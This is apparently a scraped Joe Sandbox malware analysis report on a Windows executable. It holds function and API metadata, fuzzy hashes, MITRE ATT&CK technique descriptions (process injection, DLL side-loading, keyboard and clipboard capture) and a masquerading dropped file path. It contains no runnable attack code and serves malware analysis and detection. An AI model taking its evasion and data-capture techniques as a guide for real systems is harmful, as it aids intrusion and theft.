Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: __stdio_common_vsprintf$freemallocmemmove
String ID: [io] %s: AppFocused %d
API String ID: 4069205237-3463024498
Opcode ID: 2695290c0e42ad1812660e8aaac1d4232748f79464a63f2d020f153c98c3e88d
Instruction ID: f074ad6e4ee43fd40d684273d84be52f18218a77398069fa77cabaf0f8d3f5fb
Opcode Fuzzy Hash: 2695290c0e42ad1812660e8aaac1d4232748f79464a63f2d020f153c98c3e88d
Instruction Fuzzy Hash: C431D832B0875182E7348E96998137973A5FB88B95F544235EF9DC3B84EF3CE8568740

Function 00007FF69DD10DA0 Relevance: 5.3, APIs: 4, Instructions: 284stringCOMMON

Download Yara Rule

APIs

strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,?,?), ref: 00007FF69DD10EA3
memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,?,?), ref: 00007FF69DD10FC0
memmove.VCRUNTIME140 ref: 00007FF69DD110C4

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: memmove$strncpy
String ID:
API String ID: 2493730309-0
Opcode ID: a76fde700a949dfe6e758578b375d05a838bde585a35d4546ede48b869631391
Instruction ID: 2c267e480e4c67f81f28f829763489542fa86d74f00ea9b085232c1ca8445dee
Opcode Fuzzy Hash: a76fde700a949dfe6e758578b375d05a838bde585a35d4546ede48b869631391
Instruction Fuzzy Hash: 20C11562A0C68685E7789A52E6413B9BBA1FB417C0F4452B1DACD836C5EF3CE48E8740

Function 00007FF69DCD11F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

?_Xlength_error@std@@YAXPEBD@Z.MSVCP140 ref: 00007FF69DCD11FB
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF69DCD121A

Strings

string too long, xrefs: 00007FF69DCD11F4

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: Xlength_error@std@@terminate
String ID: string too long
API String ID: 2379810350-2556327735
Opcode ID: da22bef783820e7ebceba0b2827664123ffaaa150ebfa5efe8f679bdf58982c1
Instruction ID: e5b153095f843af17e10e08ca910ce23e47ddfbe4eba002115740707b45cdcdc
Opcode Fuzzy Hash: da22bef783820e7ebceba0b2827664123ffaaa150ebfa5efe8f679bdf58982c1
Instruction Fuzzy Hash: 1DD0C920E15586D1E668AB21ED8A2382274FB1470AF9456B5C38E80560AE2D64DFCB80

Function 00007FF69DCE1510 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,00000000,00000000,00000000,00007FF69DCF9A12), ref: 00007FF69DCE1534
__stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,00000000,00000000,00000000,00007FF69DCF9A12), ref: 00007FF69DCE1555

Strings

[io] %s: AppFocused %d, xrefs: 00007FF69DCE1525

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: __acrt_iob_func__stdio_common_vfprintf
String ID: [io] %s: AppFocused %d
API String ID: 2168557111-3463024498
Opcode ID: c619f3c25ac7089c66ceb367906e76c1b23de88c793528dc8861c92fc7885b30
Instruction ID: a4c47fc7e05fd0121dd2658ebc2e5cb4337a892f9a17cc46d868a16decab0227
Opcode Fuzzy Hash: c619f3c25ac7089c66ceb367906e76c1b23de88c793528dc8861c92fc7885b30
Instruction Fuzzy Hash: 52E01C72608B8182D6108B50F90546AA3A4FB987C8F405135EBC887B69DF7CC565C740

Function 00007FF69DD00D30 Relevance: 5.2, APIs: 4, Instructions: 241COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DD00DEA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DD00E57
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DD010EF
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DD01110

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: e79206d2010ec9fa3033caffa8549567cefcee1929092e3713c95377ac1d27c1
Instruction ID: 4c95c25931088dec28a387f392e7a10ec8465c6b23fb4fb8254ce5eb229081b8
Opcode Fuzzy Hash: e79206d2010ec9fa3033caffa8549567cefcee1929092e3713c95377ac1d27c1
Instruction Fuzzy Hash: E1B1C622A14B8486E721DB35D44427EB7A4FF99BC4F049336EFC992664EF38E446C750

Function 00007FF69DCF8BE0 Relevance: 5.2, APIs: 4, Instructions: 181COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF69DCF8C7A
memchr.VCRUNTIME140 ref: 00007FF69DCF8D49
memchr.VCRUNTIME140 ref: 00007FF69DCF8D65
memmove.VCRUNTIME140 ref: 00007FF69DCF8DEC

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: memchrmemmove
String ID:
API String ID: 1132781299-0
Opcode ID: a3e189dc26eaa213a0a0c07b79a80eedaa80ed018e3753dc9aceeff30a3cdde1
Instruction ID: 60bbc6bec1a89364c5c17f563a9d809412a8bf43a9c4ab5184213ffc772b54ed
Opcode Fuzzy Hash: a3e189dc26eaa213a0a0c07b79a80eedaa80ed018e3753dc9aceeff30a3cdde1
Instruction Fuzzy Hash: 26610792B09B82C5EE388A299A406FA67A5FF45F80F444172DE9D93381EF3CE442D340

Function 00007FF69DD087B0 Relevance: 5.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF69DD081D9), ref: 00007FF69DD08869
memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF69DD081D9), ref: 00007FF69DD0887B
memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF69DD081D9), ref: 00007FF69DD08891
memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF69DD081D9), ref: 00007FF69DD0899C

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 152f17929a581685cdc78bba23be91f4811f5a4121526cb05eca7fb54fdece61
Instruction ID: 334dedc306785b9168f952b8b76d0d8627719ea014a7b9c3260d6c4d285fbebc
Opcode Fuzzy Hash: 152f17929a581685cdc78bba23be91f4811f5a4121526cb05eca7fb54fdece61
Instruction Fuzzy Hash: CE511332A04B9482D664CF2AE0402BA7765FF59BC0F18933ADE9863751EF38E158C340

Function 00007FF69DCFA900 Relevance: 5.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF69DCE9FEF), ref: 00007FF69DCFA97F
memmove.VCRUNTIME140(?,?,?,00007FF69DCE9FEF), ref: 00007FF69DCFA99B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF69DCE9FEF), ref: 00007FF69DCFA9BB
memmove.VCRUNTIME140(?,?,?,00007FF69DCE9FEF), ref: 00007FF69DCFA9E9

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: memmove$freemalloc
String ID:
API String ID: 1763039611-0
Opcode ID: e29c4a88ef318adcfd4d3c4c0851b7b3946657ae8f8855f8bcc02049b3da5514
Instruction ID: 65ac365c5a356be6fe83d804f1abf21f10720020763d67ae37e137bc45df561d
Opcode Fuzzy Hash: e29c4a88ef318adcfd4d3c4c0851b7b3946657ae8f8855f8bcc02049b3da5514
Instruction Fuzzy Hash: 6C319E72B05A82C6EA248F1AE5401A8A364FB48B84B099576DF9DD7751EF3CE562C340

Function 00007FF69DCFA010 Relevance: 5.1, APIs: 4, Instructions: 77COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCFA07A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCFA09C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCFA0DC
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCFA106

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 01b2be66546068cf80c13b26f8391aba590e1e827be473604a35372b1146f92d
Instruction ID: e3e8c4f046564199528f30415146407466f051c5fbe3c699b6a8501deb3bc238
Opcode Fuzzy Hash: 01b2be66546068cf80c13b26f8391aba590e1e827be473604a35372b1146f92d
Instruction Fuzzy Hash: ED313B32A09642C6EB288F15E540678B3B4FB44F84F089575CE9EA3754EF38E457D390

Function 00007FF69DCFAB50 Relevance: 5.0, APIs: 4, Instructions: 43COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF69DCFA1E2), ref: 00007FF69DCFAB74
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF69DCFA1E2), ref: 00007FF69DCFAB99
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF69DCFA1E2), ref: 00007FF69DCFABBE
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF69DCFA1E2), ref: 00007FF69DCFABE3

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: ae54f5c9806994ac951531603ea6b31cd4e811546bc845cfa7bd117968c93efe
Instruction ID: 175e07b31450abd3b595918d968c813f1e7e06e00574f154f6022ede38df72f8
Opcode Fuzzy Hash: ae54f5c9806994ac951531603ea6b31cd4e811546bc845cfa7bd117968c93efe
Instruction Fuzzy Hash: 9B11FA30B0A686C9FE394F15E4507B86269FF45F45F08A6B5CD8EE7260EE3DA407A350

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 4sTTCruY06.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Windows\Speech\msedge.exe

C:\Windows\appcompat\Programs\Amcache.hve

\Device\ConDrv

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

Windows Analysis Report
4sTTCruY06.exe

Function 00007FF69DCD1230 Relevance: 49.7, APIs: 24, Strings: 4, Instructions: 651
threadCOMMON

Function 00007FF69DCD30A0 Relevance: 13.6, APIs: 9, Instructions: 136
COMMON

Function 00007FF69DCD3280 Relevance: 13.6, APIs: 9, Instructions: 130
COMMON

Function 00007FF69DCD5FE0 Relevance: 37.3, APIs: 19, Strings: 2, Instructions: 501
keyboardCOMMON

Function 00007FF69DCD7050 Relevance: 30.7, APIs: 12, Strings: 5, Instructions: 984
COMMON

Function 00007FF69DCDB15E Relevance: 30.3, Strings: 23, Instructions: 1538
COMMON

Function 00007FF69DCD9820 Relevance: 30.2, APIs: 14, Strings: 3, Instructions: 450
windowregistryCOMMON

Function 00007FF69DCE0710 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 93
libraryloaderCOMMON

Function 00007FF69DCE00B0 Relevance: 21.3, APIs: 3, Strings: 9, Instructions: 273
COMMON

Function 00007FF69DCD8E10 Relevance: 18.1, APIs: 6, Strings: 4, Instructions: 552
keyboardstringCOMMON

Function 00007FF69DCE1090 Relevance: 16.7, APIs: 11, Instructions: 183
keyboardCOMMON

Function 00007FF69DCFCEA0 Relevance: 15.8, APIs: 10, Instructions: 828
COMMON

Function 00007FF69DCF9840 Relevance: 15.0, APIs: 10, Instructions: 50
clipboardmemoryCOMMON